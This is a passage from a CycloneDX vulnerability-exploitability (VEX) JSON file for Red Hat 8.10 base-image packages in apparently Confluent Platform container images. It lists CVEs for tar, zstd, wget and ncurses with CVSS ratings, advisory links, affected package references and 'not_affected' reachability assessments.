          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2021-20193",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        401,
        125
      ],
      "description": "A flaw was found in the src/list.c of tar 1.33 and earlier. This flaw allows an attacker who can submit a crafted input file to tar to cause uncontrolled consumption of memory. The highest threat from this vulnerability is to system availability.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-20193"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-20193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1917565"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20193"
        },
        {
          "url": "https://savannah.gnu.org/bugs/?59897"
        },
        {
          "url": "https://security.gentoo.org/glsa/202105-29"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5329-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-20193"
        }
      ],
      "published": "2021-03-26T17:15:12+00:00",
      "updated": "2026-06-17T03:33:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2021-24032",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 1.9,
          "severity": "info",
          "method": "CVSSv2",
          "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        277,
        276
      ],
      "description": "Beginning in v1.4.1 and prior to v1.4.9, due to an incomplete fix for CVE-2021-24031, the Zstandard command-line utility created output files with default permissions and restricted those permissions immediately afterwards. Output files could therefore momentarily be readable or writable to unintended parties.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-24032"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-24032"
        },
        {
          "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=982519"
        },
        {
          "url": "https://github.com/advisories/GHSA-ffqj-7pgc-cmj5"
        },
        {
          "url": "https://github.com/facebook/zstd/issues/2491"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-24032"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4760-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5720-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-24032"
        },
        {
          "url": "https://www.facebook.com/security/advisories/cve-2021-24032"
        }
      ],
      "published": "2021-03-04T21:15:12+00:00",
      "updated": "2026-06-17T03:39:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.4.4-1.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2021-31879",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.8,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        601
      ],
      "description": "GNU Wget through 1.21.1 does not omit the Authorization header upon a redirect to a different origin, a related issue to CVE-2018-1000007.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-31879"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-31879"
        },
        {
          "url": "https://mail.gnu.org/archive/html/bug-wget/2021-02/msg00002.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31879"
        },
        {
          "url": "https://savannah.gnu.org/bugs/?56909"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20210618-0002/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-31879"
        }
      ],
      "published": "2021-04-29T05:15:08+00:00",
      "updated": "2026-06-17T03:52:23+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.19.5-12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2021-39537",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        787
      ],
      "description": "An issue was discovered in ncurses through v6.2-1. _nc_captoinfo in captoinfo.c has a heap-based buffer overflow.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-39537"
        },
        {
          "url": "http://cvsweb.netbsd.org/bsdweb.cgi/pkgsrc/devel/ncurses/patches/patch-ncurses_tinfo_captoinfo.c?rev=1.1&content-type=text/x-cvsweb-markup"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2022/Oct/28"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2022/Oct/41"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2022/Oct/43"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2022/Oct/45"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-39537"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00004.html"
        },
        {
          "url": "https://lists.gnu.org/archive/html/bug-ncurses/2020-08/msg00006.html"
        },
        {
          "url": "https://lists.gnu.org/archive/html/bug-ncurses/2021-10/msg00023.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39537"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230427-0012/"
        },
        {
          "url": "https://support.apple.com/kb/HT213443"
        },
        {
          "url": "https://support.apple.com/kb/HT213444"
        },
        {
          "url": "https://support.apple.com/kb/HT213488"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5477-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6099-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-39537"
        }
      ],
      "published": "2021-09-20T16:15:12+00:00",
      "updated": "2026-07-27T13:43:06+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
